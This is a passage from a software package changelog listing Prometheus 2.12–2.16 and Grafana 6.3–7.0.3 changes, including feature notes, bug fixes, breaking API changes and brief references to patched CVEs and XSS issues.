labels #6664\n\n - PromQL: Fix unary operator precedence #6579\n\n - PromQL: Respect query.timeout even when we reach\n query.max-concurrency #6712\n\n - PromQL: Fix string and parentheses handling in engine,\n which affected React UI #6612\n\n - PromQL: Remove output labels returned by absent() if\n they are produced by multiple identical label matchers\n #6493\n\n - Scrape: Validate that OpenMetrics input ends with `#\n EOF` #6505\n\n - Remote read: return the correct error if configs can't\n be marshal'd to JSON #6622\n\n - Remote write: Make remote client `Store` use passed\n context, which can affect shutdown timing #6673\n\n - Remote write: Improve sharding calculation in cases\n where we would always be consistently behind by tracking\n pendingSamples #6511\n\n - Ensure prometheus_rule_group metrics are deleted when a\n rule group is removed #6693\n\n - Changes from 2.15.2\n\n + Bug fixes\n\n - TSDB: Fixed support for TSDB blocks built with\n Prometheus before 2.1.0. #6564\n\n - TSDB: Fixed block compaction issues on Windows. #6547\n\n - Changes from 2.15.1\n\n + Bug fixes\n\n - TSDB: Fixed race on concurrent queries against same\n data. #6512\n\n - Changes from 2.15.0\n\n + Features \n\n - API: Added new endpoint for exposing per metric metadata\n `/metadata`. #6420 #6442\n\n + Changes\n\n - Discovery: Removed `prometheus_sd_kubernetes_cache_*`\n metrics. Additionally\n `prometheus_sd_kubernetes_workqueue_latency_seconds` and\n `prometheus_sd_kubernetes_workqueue_work_duration_second\n s` metrics now show correct values in seconds. #6393\n\n - Remote write: Changed `query` label on\n `prometheus_remote_storage_*` metrics to `remote_name`\n and `url`. #6043\n\n + Enhancements\n\n - TSDB: Significantly reduced memory footprint of loaded\n TSDB blocks. #6418 #6461\n\n - TSDB: Significantly optimized what we buffer during\n compaction which should result in lower memory footprint\n during compaction. #6422 #6452 #6468 #6475\n\n - TSDB: Improve replay latency. #6230\n\n - TSDB: WAL size is now used for size based retention\n calculation. #5886\n\n - Remote read: Added query grouping and range hints to the\n remote read request #6401\n\n - Remote write: Added\n `prometheus_remote_storage_sent_bytes_total` counter per\n queue. #6344\n\n - promql: Improved PromQL parser performance. #6356\n\n - React UI: Implemented missing pages like `/targets`\n #6276, TSDB status page #6281 #6267 and many other fixes\n and performance improvements.\n\n - promql: Prometheus now accepts spaces between time range\n and square bracket. e.g `[ 5m]` #6065 \n\n + Bug fixes\n\n - Config: Fixed alertmanager configuration to not miss\n targets when configurations are similar. #6455\n\n - Remote write: Value of\n `prometheus_remote_storage_shards_desired` gauge shows\n raw value of desired shards and it's updated correctly.\n #6378\n\n - Rules: Prometheus now fails the evaluation of rules and\n alerts where metric results collide with labels\n specified in `labels` field. #6469\n\n - API: Targets Metadata API `/targets/metadata` now\n accepts empty `match_targets` parameter as in the spec.\n #6303\n\n - Changes from 2.14.0\n\n + Features \n\n - API: `/api/v1/status/runtimeinfo` and\n `/api/v1/status/buildinfo` endpoints added for use by\n the React UI. #6243\n\n - React UI: implement the new experimental React based UI.\n #5694 and many more\n\n - Can be found by under `/new`.\n\n - Not all pages are implemented yet.\n\n - Status: Cardinality statistics added to the Runtime &\n Build Information page. #6125\n\n + Enhancements\n\n - Remote write: fix delays in remote write after a\n compaction. #6021\n\n - UI: Alerts can be filtered by state. #5758\n\n + Bug fixes\n\n - Ensure warnings from the API are escaped. #6279\n\n - API: lifecycle endpoints return 403 when not enabled.\n #6057\n\n - Build: Fix Solaris build. #6149\n\n - Promtool: Remove false duplicate rule warnings when\n checking rule files with alerts. #6270\n\n - Remote write: restore use of deduplicating logger in\n remote write. #6113\n\n - Remote write: do not reshard when unable to send\n samples. #6111\n\n - Service discovery: errors are no longer logged on\n context cancellation. #6116, #6133\n\n - UI: handle null response from API properly. #6071\n\n - Changes from 2.13.1\n\n + Bug fixes\n\n - Fix panic in ARM builds of Prometheus. #6110\n\n - promql: fix potential panic in the query logger. #6094\n\n - Multiple errors of http: superfluous\n response.WriteHeader call in the logs. #6145\n\n - Changes from 2.13.0\n\n + Enhancements\n\n - Metrics: renamed prometheus_sd_configs_failed_total to\n prometheus_sd_failed_configs and changed to Gauge #5254\n\n - Include the tsdb tool in builds. #6089\n\n - Service discovery: add new node address types for\n kubernetes. #5902\n\n - UI: show warnings if query have returned some warnings.\n #5964\n\n - Remote write: reduce memory usage of the series cache.\n #5849\n\n - Remote read: use remote read streaming to reduce memory\n usage. #5703\n\n - Metrics: added metrics for remote write max/min/desired\n shards to queue manager. #5787\n\n - Promtool: show the warnings during label query. #5924\n\n - Promtool: improve error messages when parsing bad rules.\n #5965\n\n - Promtool: more promlint rules. #5515\n\n + Bug fixes\n\n - UI: Fix a Stored DOM XSS vulnerability with query\n history\n [CVE-2019-10215](http://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2019-10215). #6098\n\n - Promtool: fix recording inconsistency due to duplicate\n labels. #6026\n\n - UI: fixes service-discovery view when accessed from\n unhealthy targets. #5915\n\n - Metrics format: OpenMetrics parser crashes on short\n input. #5939\n\n - UI: avoid truncated Y-axis values. #6014\n\n - Changes from 2.12.0\n\n + Features \n\n - Track currently active PromQL queries in a log file.\n #5794\n\n - Enable and provide binaries for `mips64` / `mips64le`\n architectures. #5792\n\n + Enhancements\n\n - Improve responsiveness of targets web UI and API\n endpoint. #5740\n\n - Improve remote write desired shards calculation. #5763\n\n - Flush TSDB pages more precisely. tsdb#660\n\n - Add `prometheus_tsdb_retention_limit_bytes` metric.\n tsdb#667\n\n - Add logging during TSDB WAL replay on startup. tsdb#662\n\n - Improve TSDB memory usage. tsdb#653, tsdb#643, tsdb#654,\n tsdb#642, tsdb#627\n\n + Bug fixes\n\n - Check for duplicate label names in remote read. #5829\n\n - Mark deleted rules' series as stale on next evaluation.\n #5759\n\n - Fix JavaScript error when showing warning about\n out-of-sync server time. #5833\n\n - Fix `promtool test rules` panic when providing empty\n `exp_labels`. #5774\n\n - Only check last directory when discovering checkpoint\n number. #5756\n\n - Fix error propagation in WAL watcher helper functions.\n #5741\n\n - Correctly handle empty labels from alert templates.\n #5845\n\n - Update Uyuni/SUSE Manager service discovery patch\n\n + Adapt service discovery to the new Uyuni API endpoints\n\n + Modified spec file: force golang 1.12 to fix build\n issues in SLE15SP2\n\n - Update to Prometheus 2.11.2\n\ngrafana :\n\n - Update to version 7.0.3\n\n - Features / Enhancements\n\n - Stats: include all fields. #24829, @ryantxu\n\n - Variables: change VariableEditorList row action Icon to\n IconButton. #25217, @hshoff\n\n - Bug fixes\n\n - Cloudwatch: Fix dimensions of DDoSProtection. #25317,\n @papagian\n\n - Configuration: Fix env var override of sections\n containing hyphen. #25178, @marefr\n\n - Dashboard: Get panels in collapsed rows. #25079,\n @peterholmberg\n\n - Do not show alerts tab when alerting is disabled.\n #25285, @dprokop\n\n - Jaeger: fixes cascader option label duration value.\n #25129, @Estrax\n\n - Transformations: Fixed Transform tab crash & no update\n after adding first transform. #25152, @torkelo\n\n - Update to version 7.0.2\n\n - Bug fixes\n\n - Security: Urgent security patch release to fix\n CVE-2020-13379\n\n - Update to version 7.0.1\n\n - Features / Enhancements\n\n - Datasource/CloudWatch: Makes CloudWatch Logs query\n history more readable. #24795, @kaydelaney\n\n - Download CSV: Add date and time formatting. #24992,\n @ryantxu\n\n - Table: Make last cell value visible when right aligned.\n #24921, @peterholmberg\n\n - TablePanel: Adding sort order persistance. #24705,\n @torkelo\n\n - Transformations: Display correct field name when using\n reduce transformation. #25068, @peterholmberg\n\n - Transformations: Allow custom number input for binary\n operations. #24752, @ryantxu\n\n - Bug fixes\n\n - Dashboard/Links: Fixes dashboard links by tags not\n working. #24773, @KamalGalrani\n\n - Dashboard/Links: Fixes open in new window for dashboard\n link. #24772, @KamalGalrani\n\n - Dashboard/Links: Variables are resolved and limits to\n 100. #25076, @hugohaggmark\n\n - DataLinks: Bring back variables interpolation in title.\n #24970, @dprokop\n\n - Datasource/CloudWatch: Field suggestions no longer\n limited to prefix-only. #24855, @kaydelaney\n\n - Explore/Table: Keep existing field types if possible.\n #24944, @kaydelaney\n\n - Explore: Fix wrap lines toggle for results of queries\n with filter expression. #24915, @ivanahuckova\n\n - Explore: fix undo in query editor. #24797, @zoltanbedi\n\n - Explore: fix word break in type head info. #25014,\n @zoltanbedi\n\n - Graph: Legend decimals now work as expected. #24931,\n @torkelo\n\n - LoginPage: Fix hover color for service buttons. #25009,\n @tskarhed\n\n - LogsPanel: Fix scrollbar. #24850, @ivanahuckova\n\n - MoveDashboard: Fix for moving dashboard caused all\n variables to be lost. #25005, @torkelo\n\n - Organize transformer: Use display name in field order\n comparer. #24984, @dprokop\n\n - Panel: shows correct panel menu items in view mode.\n #24912, @hugohaggmark\n\n - PanelEditor Fix missing labels and description if there\n is only single option in category. #24905, @dprokop\n\n - PanelEditor: Overrides name matcher still show all\n original field names even after Field default display\n name is specified. #24933, @torkelo\n\n - PanelInspector: Makes sure Data display options are\n visible. #24902, @hugohaggmark\n\n - PanelInspector: Hides unsupported data display options\n for Panel type. #24918, @hugohaggmark\n\n - PanelMenu: Make menu disappear on button press. #25015,\n @tskarhed\n\n - Postgres: Fix add button. #25087, @phemmer\n\n - Prometheus: Fix recording rules expansion. #24977,\n @ivanahuckova\n\n - Stackdriver: Fix creating Service Level Objectives (SLO)\n datasource query variable. #25023, @papagian\n\n - Update to version 7.0.0 \n\n - Breaking changes\n\n - Removed PhantomJS: PhantomJS was deprecated in Grafana\n v6.4 and starting from Grafana v7.0.0, all PhantomJS\n support has been removed. This means that Grafana no\n longer ships with a built-in image renderer, and we\n advise you to install the Grafana Image Renderer plugin.\n\n - Dashboard: A global minimum dashboard refresh interval\n is now enforced and defaults to 5 seconds.\n\n - Interval calculation: There is now a new option Max data\n points that controls the auto interval $__interval\n calculation. Interval was previously calculated by\n dividing the panel width by the time range. With the new\n max data points option it is now easy to set $__interval\n to a dynamic value that is time range agnostic. For\n example if you set Max data points to 10 Grafana will\n dynamically set $__interval by dividing the current time\n range by 10.\n\n - Datasource/Loki: Support for deprecated Loki endpoints\n has been removed.\n\n - Backend plugins: Grafana now requires backend plugins to\n be signed, otherwise Grafana will not load/start them.\n This is an additional security measure to make sure\n backend plugin binaries and files haven't been tampered\n with. Refer to Upgrade Grafana for more information.\n\n - @grafana/ui: Forms migration notice, see @grafana/ui\n changelog\n\n - @grafana/ui: Select API change for creating custom\n values, see @grafana/ui changelog\n\n + Deprecation warnings\n\n - Scripted dashboards is now deprecated. The feature is\n not removed but will be in a future release. We hope to\n address the underlying requirement of dynamic dashboards\n in a different way. #24059\n\n - The unofficial first version of backend plugins together\n with usage of grafana/grafana-plugin-model is now\n deprecated and support for that will be removed in a\n future release. Please refer to backend plugins\n documentation for information about the new officially\n supported backend plugins.\n\n - Features / Enhancements\n\n - Backend plugins: Log deprecation warning when using the\n unofficial first version of backend plugins. #24675,\n @marefr\n\n - Editor: New line on Enter, run query on Shift+Enter.\n #24654, @davkal\n\n - Loki: Allow multiple derived fields with the same name.\n #24437, @aocenas\n\n - Orgs: Add future deprecation notice. #24502, @torkelo\n\n - Bug Fixes\n\n - @grafana/toolkit: Use process.cwd() instead of PWD to\n get directory. #24677, @zoltanbedi\n\n - Admin: Makes long settings values line break in settings\n page. #24559, @hugohaggmark\n\n - Dashboard: Allow editing provisioned dashboard JSON and\n add confirmation when JSON is copied to dashboard.\n #24680, @dprokop\n\n - Dashboard: Fix for strange 'dashboard not found' errors\n when opening links in dashboard settings. #24416,\n @torkelo\n\n - Dashboard: Fix so default data source is selected when\n data source can't be found in panel editor. #24526,\n @mckn\n\n - Dashboard: Fixed issue changing a panel from transparent\n back to normal in panel editor. #24483, @torkelo\n\n - Dashboard: Make header names reflect the field name when\n exporting to CSV file from the the panel inspector.\n #24624, @peterholmberg\n\n - Dashboard: Make sure side pane is displayed with tabs by\n default in panel editor. #24636, @dprokop\n\n - Data source: Fix query/annotation help content\n formatting. #24687, @AgnesToulet\n\n - Data source: Fixes async mount errors. #24579, @Estrax\n\n - Data source: Fixes saving a data source without failure\n when URL doesn't specify a protocol. #24497, @aknuds1\n\n - Explore/Prometheus: Show results of instant queries only\n in table. #24508, @ivanahuckova\n\n - Explore: Fix rendering of react query editors. #24593,\n @ivanahuckova\n\n - Explore: Fixes loading more logs in logs context view.\n #24135, @Estrax\n\n - Graphite: Fix schema and dedupe strategy in rollup\n indicators for Metrictank queries. #24685, @torkelo\n\n - Graphite: Makes query annotations work again. #24556,\n @hugohaggmark\n\n - Logs: Clicking 'Load more' from context overlay doesn't\n expand log row. #24299, @kaydelaney\n\n - Logs: Fix total bytes process calculation. #24691,\n @davkal\n\n - Org/user/team preferences: Fixes so UI Theme can be set\n back to Default. #24628, @AgnesToulet\n\n - Plugins: Fix manifest validation. #24573, @aknuds1\n\n - Provisioning: Use proxy as default access mode in\n provisioning. #24669, @bergquist\n\n - Search: Fix select item when pressing enter and Grafana\n is served using a sub path. #24634, @tskarhed\n\n - Search: Save folder expanded state. #24496, @Clarity-89\n\n - Security: Tag value sanitization fix in OpenTSDB data\n source. #24539, @rotemreiss\n\n - Table: Do not include angular options in options when\n switching from angular panel. #24684, @torkelo\n\n - Table: Fixed persisting column resize for time series\n fields. #24505, @torkelo\n\n - Table: Fixes Cannot read property subRows of null.\n #24578, @hugohaggmark\n\n - Time picker: Fixed so you can enter a relative range in\n the time picker without being converted to absolute\n range. #24534, @mckn\n\n - Transformations: Make transform dropdowns not cropped.\n #24615, @dprokop\n\n - Transformations: Sort order should be preserved as\n entered by user when using the reduce transformation.\n #24494, @hugohaggmark\n\n - Units: Adds scale symbol for currencies with suffixed\n symbol. #24678, @hugohaggmark\n\n - Variables: Fixes filtering options with more than 1000\n entries. #24614, @hugohaggmark\n\n - Variables: Fixes so Textbox variables read value from\n url. #24623, @hugohaggmark\n\n - Zipkin: Fix error when span contains remoteEndpoint.\n #24524, @aocenas\n\n - SAML: Switch from email to login for user login\n attribute mapping (Enterprise)\n\n - Update Makefile and spec file\n\n - Remove phantomJS patch from Makefile \n\n - Fix multiline strings in Makefile\n\n - Exclude s390 from SLE12 builds, golang 1.14 is not built\n for s390\n\n - Add instructions for patching the Grafana JavaScript\n frontend.\n\n - BuildRequires golang(API) instead of go metapackage\n version range\n\n - BuildRequires: golang(API) >= 1.14 from BuildRequires: (\n go >= 1.14 with go < 1.15 )\n\n - Update to version 6.7.3\n\n - This version fixes bsc#1170557 and its corresponding\n CVE-2020-12245\n\n - Admin: Fix Synced via LDAP message for non-LDAP external\n users. #23477, @alexanderzobnin\n\n - Alerting: Fixes notifications for alerts with empty\n message in Google Hangouts notifier. #23559,\n @hugohaggmark\n\n - AuthProxy: Fixes bug where long username could not be\n cached.. #22926, @jcmcken\n\n - Dashboard: Fix saving dashboard when editing raw\n dashboard JSON model. #23314, @peterholmberg\n\n - Dashboard: Try to parse 8 and 15 digit numbers as\n timestamps if parsing of time range as date fails.\n #21694, @jessetan\n\n - DashboardListPanel: Fixed problem with empty panel after\n going into edit mode (General folder filter being\n automatically added) . #23426, @torkelo\n\n - Data source: Handle datasource withCredentials option\n properly. #23380, @hvtuananh\n\n - Security: Fix annotation popup XSS vulnerability.\n #23813, @torkelo\n\n - Server: Exit Grafana with status code 0 if no error.\n #23312, @aknuds1\n\n - TablePanel: Fix XSS issue in header column rename\n (backport). #23814, @torkelo\n\n - Variables: Fixes error when setting adhoc variable\n values. #23580, @hugohaggmark\n\n - Update to version 6.7.2: (see installed changelog for\n the full list of changes)\n\n - BackendSrv: Adds config to response to fix issue for\n external plugins that used this property . #23032,\n @torkelo\n\n - Dashboard: Fixed issue with saving new dashboard after\n changing title . #23104, @dprokop\n\n - DataLinks: make sure we use the correct datapoint when\n dataset contains null value.. #22981, @mckn\n\n - Plugins: Fixed issue for plugins that imported dateMath\n util . #23069, @mckn\n\n - Security: Fix for dashboard snapshot original dashboard\n link could contain XSS vulnerability in url. #23254,\n @torkelo\n\n - Variables: Fixes issue with too many queries being\n issued for nested template variables after value change.\n #23220, @torkelo\n\n - Plugins: Expose promiseToDigest. #23249, @torkelo\n\n - Reporting (Enterprise): Fixes issue updating a report\n created by someone else\n\n - Update to 6.7.1: (see installed changelog for the full\n list of changes) Bug Fixes\n\n - Azure: Fixed dropdowns not showing current value.\n #22914, @torkelo\n\n - BackendSrv: only add content-type on POST, PUT requests.\n #22910, @hugohaggmark\n\n - Panels: Fixed size issue with panel internal size when\n exiting panel edit mode. #22912, @torkelo\n\n - Reporting: fixes migrations compatibility with mysql\n (Enterprise)\n\n - Reporting: Reduce default concurrency limit to 4\n (Enterprise)\n\n - Update to 6.7.0: (see installed changelog for the full\n list of changes) Bug Fixes\n\n - AngularPanels: Fixed inner height calculation for\n angular panels . #22796, @torkelo\n\n - BackendSrv: makes sure provided headers are correctly\n recognized and set. #22778, @hugohaggmark\n\n - Forms: Fix input suffix position (caret-down in Select)\n . #22780, @torkelo\n\n - Graphite: Fixed issue with query editor and next select\n metric now showing after selecting metric node . #22856,\n @torkelo\n\n - Rich History: UX adjustments and fixes. #22729,\n @ivanahuckova\n\n - Update to 6.7.0-beta1: Breaking changes\n\n - Slack: Removed Mention setting and instead introduce\n Mention Users, Mention Groups, and Mention Channel. The\n first two settings require user and group IDs,\n respectively. This change was necessary because the way\n of mentioning via the Slack API changed and mentions in\n Slack notifications no longer worked.\n\n - Alerting: Reverts the behavior of diff and percent_diff\n to not always be absolute. Something we introduced by\n mistake in 6.1.0. Alerting now support diff(),\n diff_abs(), percent_diff() and percent_diff_abs().\n #21338\n\n - Notice about changes in backendSrv for plugin authors In\n our mission to migrate away from AngularJS to React we\n have removed all AngularJS dependencies in the core data\n retrieval service backendSrv. Removing the AngularJS\n dependencies in backendSrv has the unfortunate side\n effect of AngularJS digest no longer being triggered for\n any request made with backendSrv. Because of this,\n external plugins using backendSrv directly may suffer\n from strange behaviour in the UI. To remedy this issue,\n as a plugin author you need to trigger the digest after\n a direct call to backendSrv. Bug Fixes API: Fix redirect\n issues. #22285, @papagian Alerting: Don't include\n image_url field with Slack message if empty. #22372,\n @aknuds1 Alerting: Fixed bad background color for\n default notifications in alert tab . #22660, @krvajal\n Annotations: In table panel when setting transform to\n annotation, they will now show up right away without a\n manual refresh. #22323, @krvajal Azure Monitor: Fix app\n insights source to allow for new __timeFrom and\n __timeTo. #21879, @ChadNedzlek BackendSrv: Fixes POST\n body for form data. #21714, @hugohaggmark CloudWatch:\n Credentials cache invalidation fix. #22473, @sunker\n CloudWatch: Expand alias variables when query yields no\n result. #22695, @sunker Dashboard: Fix bug with NaN in\n alerting. #22053, @a-melnyk Explore: Fix display of\n multiline logs in log panel and explore. #22057,\n @thomasdraebing Heatmap: Legend color range is incorrect\n when using custom min/max. #21748, @sv5d Security: Fixed\n XSS issue in dashboard history diff . #22680, @torkelo\n StatPanel: Fixes base color is being used for null\n values . #22646, @torkelo\n\n - Update to version 6.6.2: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.6.1: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.6.0: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.3: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.2: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.1: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.0 (see installed changelog for the\n full list of changes)\n\n - Update to version 6.4.5 :\n\n - Create version 6.4.5\n\n - CloudWatch: Fix high CPU load (#20579)\n\n - Add obs-service-go_modules to download required modules\n into vendor.tar.gz\n\n - Adjusted spec file to use vendor.tar.gz\n\n - Adjusted Makefile to work with new filenames\n\n - BuildRequire go1.14\n\n - Update to version 6.4.4 :\n\n - DataLinks: Fix blur issues. #19883, @aocenas\n\n - Docker: Makes it possible to parse timezones in the\n docker image. #20081, @xlson\n\n - LDAP: All LDAP servers should be tried even if one of\n them returns a connection error. #20077, @jongyllen\n\n - LDAP: No longer shows incorrectly matching groups based\n on role in debug page. #20018, @xlson\n\n - Singlestat: Fix no data / null value mapping . #19951,\n @ryantxu\n\n - Revert the spec file and make script\n\n - Remove PhantomJS dependency\n\n - Update to 6.4.3\n\n - Bug Fixes\n\n - Alerting: All notification channels should send even if\n one fails to send. #19807, @jan25\n\n - AzureMonitor: Fix slate interference with dropdowns.\n #19799, @aocenas\n\n - ContextMenu: make ContextMenu positioning aware of the\n viewport width. #19699, @krvajal\n\n - DataLinks: Fix context menu not showing in\n singlestat-ish visualisations. #19809, @dprokop\n\n - DataLinks: Fix url field not releasing focus. #19804,\n @aocenas\n\n - Datasource: Fixes clicking outside of some query editors\n required 2 clicks. #19822, @aocenas\n\n - Panels: Fixes default tab for visualizations without\n Queries Tab. #19803, @hugohaggmark\n\n - Singlestat: Fixed issue with mapping null to text.\n #19689, @torkelo\n\n - @grafana/toolkit: Don't fail plugin creation when git\n user.name config is not set. #19821, @dprokop\n\n - @grafana/toolkit: TSLint line number off by 1. #19782,\n @fredwangwang\n\n - Update to 6.4.2\n\n - Bug Fixes\n\n - CloudWatch: Changes incorrect dimension wmlid to wlmid .\n #19679, @ATTron\n\n - Grafana Image Renderer: Fixes plugin page. #19664,\n @hugohaggmark\n\n - Graph: Fixes auto decimals logic for y axis ticks that\n results in too many decimals for high values. #19618,\n @torkelo\n\n - Graph: Switching to series mode should re-render graph.\n #19623, @torkelo\n\n - Loki: Fix autocomplete on label values. #19579, @aocenas\n\n - Loki: Removes live option for logs panel. #19533,\n @davkal\n\n - Profile: Fix issue with user profile not showing more\n than sessions sessions in some cases. #19578,\n @huynhsamha\n\n - Prometheus: Fixes so results in Panel always are sorted\n by query order. #19597, @hugohaggmark\n\n - ShareQuery: Fixed issue when using -- Dashboard --\n datasource (to share query result) when dashboard had\n rows. #19610, @torkelo\n\n - Show SAML login button if SAML is enabled. #19591,\n @papagian\n\n - SingleStat: Fixes postfix/prefix usage. #19687,\n @hugohaggmark\n\n - Table: Proper handling of json data with dataframes.\n #19596, @marefr\n\n - Units: Fixed wrong id for Terabits/sec. #19611,\n @andreaslangnevyjel\n\n - Changes from 6.4.1\n\n - Bug Fixes\n\n - Provisioning: Fixed issue where empty nested keys in\n YAML provisioning caused a server crash, #19547\n\n - ImageRendering: Fixed issue with image rendering in\n enterprise build (Enterprise)\n\n - Reporting: Fixed issue with reporting service when STMP\n was disabled (Enterprise).\n\n - Changes from 6.4.0\n\n - Features / Enhancements\n\n - Build: Upgrade go to 1.12.10. #19499, @marefr\n\n - DataLinks: Suggestions menu improvements. #19396,\n @dprokop\n\n - Explore: Take root_url setting into account when\n redirecting from dashboard to explore. #19447,\n @ivanahuckova\n\n - Explore: Update broken link to logql docs. #19510,\n @ivanahuckova\n\n - Logs: Adds Logs Panel as a visualization. #19504,\n @davkal\n\n - Bug Fixes\n\n - CLI: Fix version selection for plugin install. #19498,\n @aocenas\n\n - Graph: Fixes minor issue with series override color\n picker and custom color . #19516, @torkelo\n\n - Changes from 6.4.0 Beta 2\n\n - Features / Enhancements\n\n - Azure Monitor: Remove support for cross resource queries\n (#19115)'. #19346, @sunker\n\n - Docker: Upgrade packages to resolve reported\n vulnerabilities. #19188, @marefr\n\n - Graphite: Time range expansion reduced from 1 minute to\n 1 second. #19246, @torkelo\n\n - grafana/toolkit: Add plugin creation task. #19207,\n @dprokop\n\n - Bug Fixes\n\n - Alerting: Prevents creating alerts from unsupported\n queries. #19250, @hugohaggmark\n\n - Alerting: Truncate PagerDuty summary when greater than\n 1024 characters. #18730, @nvllsvm\n\n - Cloudwatch: Fix autocomplete for Gamelift dimensions.\n #19146, @kevinpz\n\n - Dashboard: Fix export for sharing when panels use\n default data source. #19315, @torkelo\n\n - Database: Rewrite system statistics query to perform\n better. #19178, @papagian\n\n - Gauge/BarGauge: Fix issue with [object Object] in titles\n . #19217, @ryantxu\n\n - MSSQL: Revert usage of new connectionstring format\n introduced by #18384. #19203, @marefr\n\n - Multi-LDAP: Do not fail-fast on invalid credentials.\n #19261, @gotjosh\n\n - MySQL, Postgres, MSSQL: Fix validating query with\n template variables in alert . #19237, @marefr\n\n - MySQL, Postgres: Update raw sql when query builder\n updates. #19209, @marefr\n\n - MySQL: Limit datasource error details returned from the\n backend. #19373, @marefr\n\n - Changes from 6.4.0 Beta 1\n\n - Features / Enhancements\n\n - API: Readonly datasources should not be created via the\n API. #19006, @papagian\n\n - Alerting: Include configured AlertRuleTags in Webhooks\n notifier. #18233, @dominic-miglar\n\n - Annotations: Add annotations support to Loki. #18949,\n @aocenas\n\n - Annotations: Use a single row to represent a region.\n #17673, @ryantxu\n\n - Auth: Allow inviting existing users when login form is\n disabled. #19048, @548017\n\n - Azure Monitor: Add support for cross resource queries.\n #19115, @sunker\n\n - CLI: Allow installing custom binary plugins. #17551,\n @aocenas\n\n - Dashboard: Adds Logs Panel (alpha) as visualization\n option for Dashboards. #18641, @hugohaggmark\n\n - Dashboard: Reuse query results between panels . #16660,\n @ryantxu\n\n - Dashboard: Set time to to 23:59:59 when setting To time\n using calendar. #18595, @simPod\n\n - DataLinks: Add DataLinks support to Gauge, BarGauge and\n SingleStat2 panel. #18605, @ryantxu\n\n - DataLinks: Enable access to labels & field names.\n #18918, @torkelo\n\n - DataLinks: Enable multiple data links per panel. #18434,\n @dprokop\n\n - Docker: switch docker image to alpine base with\n phantomjs support. #18468, @DanCech\n\n - Elasticsearch: allow templating queries to order by\n doc_count. #18870, @hackery\n\n - Explore: Add throttling when doing live queries. #19085,\n @aocenas\n\n - Explore: Adds ability to go back to dashboard,\n optionally with query changes. #17982, @kaydelaney\n\n - Explore: Reduce default time range to last hour. #18212,\n @davkal\n\n - Gauge/BarGauge: Support decimals for min/max. #18368,\n @ryantxu\n\n - Graph: New series override transform constant that\n renders a single point as a line across the whole graph.\n #19102, @davkal\n\n - Image rendering: Add deprecation warning when PhantomJS\n is used for rendering images. #18933, @papagian\n\n - InfluxDB: Enable interpolation within ad-hoc filter\n values. #18077, @kvc-code\n\n - LDAP: Allow an user to be synchronized against LDAP.\n #18976, @gotjosh\n\n - Ldap: Add ldap debug page. #18759, @peterholmberg\n\n - Loki: Remove prefetching of default label values.\n #18213, @davkal\n\n - Metrics: Add failed alert notifications metric. #18089,\n @koorgoo\n\n - OAuth: Support JMES path lookup when retrieving user\n email. #14683, @bobmshannon\n\n - OAuth: return GitLab groups as a part of user info\n (enable team sync). #18388, @alexanderzobnin\n\n - Panels: Add unit for electrical charge - ampere-hour.\n #18950, @anirudh-ramesh\n\n - Plugin: AzureMonitor - Reapply MetricNamespace support.\n #17282, @raphaelquati\n\n - Plugins: better warning when plugins fail to load.\n #18671, @ryantxu\n\n - Postgres: Add support for scram sha 256 authentication.\n #18397, @nonamef\n\n - RemoteCache: Support SSL with Redis. #18511, @kylebrandt\n\n - SingleStat: The gauge option in now disabled/hidden\n (unless it's an old panel with it already enabled) .\n #18610, @ryantxu\n\n - Stackdriver: Add extra alignment period options. #18909,\n @sunker\n\n - Units: Add South African Rand (ZAR) to currencies.\n #18893, @jeteon\n\n - Units: Adding T,P,E,Z,and Y bytes. #18706, @chiqomar\n\n - Bug Fixes\n\n - Alerting: Notification is sent when state changes from\n no_data to ok. #18920, @papagian\n\n - Alerting: fix duplicate alert states when the alert\n fails to save to the database. #18216, @kylebrandt\n\n - Alerting: fix response popover prompt when add\n notification channels. #18967, @lzdw\n\n - CloudWatch: Fix alerting for queries with Id (using\n GetMetricData). #17899, @alex-berger\n\n - Explore: Fix auto completion on label values for Loki.\n #18988, @aocenas\n\n - Explore: Fixes crash using back button with a zoomed in\n graph. #19122, @hugohaggmark\n\n - Explore: Fixes so queries in Explore are only run if\n Graph/Table is shown. #19000, @hugohaggmark\n\n - MSSQL: Change connectionstring to URL format to fix\n using passwords with semicolon. #18384, @Russiancold\n\n - MSSQL: Fix memory leak when debug enabled. #19049,\n @briangann\n\n - Provisioning: Allow escaping literal '$' with '$$' in\n configs to avoid interpolation. #18045, @kylebrandt\n\n - TimePicker: Fixes hiding time picker dropdown in\n FireFox. #19154, @hugohaggmark\n\n - Breaking changes\n\n + Annotations There are some breaking changes in the\n annotations HTTP API for region annotations. Region\n annotations are now represented using a single event\n instead of two separate events. Check breaking changes\n in HTTP API below and HTTP API documentation for more\n details.\n\n + Docker Grafana is now using Alpine 3.10 as docker base\n image.\n\n + HTTP API\n\n - GET /api/alert-notifications now requires at least\n editor access. New /api/alert-notifications/lookup\n returns less information than /api/alert-notifications\n and can be access by any authenticated user.\n\n - GET /api/alert-notifiers now requires at least editor\n access\n\n - GET /api/org/users now requires org admin role. New\n /api/org/users/lookup returns less information than\n /api/org/users and can be access by users that are org\n admins, admin in any folder or admin of any team.\n\n - GET /api/annotations no longer returns regionId\n property.\n\n - POST /api/annotations no longer supports isRegion\n property.\n\n - PUT /api/annotations/:id no longer supports isRegion\n property.\n\n - PATCH /api/annotations/:id no longer supports isRegion\n property.\n\n - DELETE /api/annotations/region/:id has been removed.\n\n - Deprecation notes\n\n + PhantomJS\n\n - PhantomJS, which is used for rendering images of\n dashboards and panels, is deprecated and will be removed\n in a future Grafana release. A deprecation warning will\n from now on be logged when Grafana starts up if\n PhantomJS is in use. Please consider migrating from\n PhantomJS to the Grafana Image Renderer plugin.\n\n - Changes from 6.3.6\n\n - Features / Enhancements\n\n - Metrics: Adds setting for turning off total stats\n metrics. #19142, @marefr\n\n - Bug Fixes\n\n - Database: Rewrite system statistics query to perform\n better. #19178, @papagian\n\n - Explore: Fixes error when switching from prometheus to\n loki data sources. #18599, @kaydelaney\n\n - Rebase package spec. Use mostly from fedora, fix suse\n specified things and fix some errors.\n\n - Add missing directories provisioning/datasources and\n provisioning/notifiers and sample.yaml as described in\n packaging/rpm/control from upstream. Missing directories\n are shown in logfiles.\n\n - Version 6.3.5\n\n - Upgrades\n\n + Build: Upgrade to go 1.12.9.\n\n - Bug Fixes\n\n + Dashboard: Fixes dashboards init failed loading error\n for dashboards with panel links that had missing\n properties.\n\n + Editor: 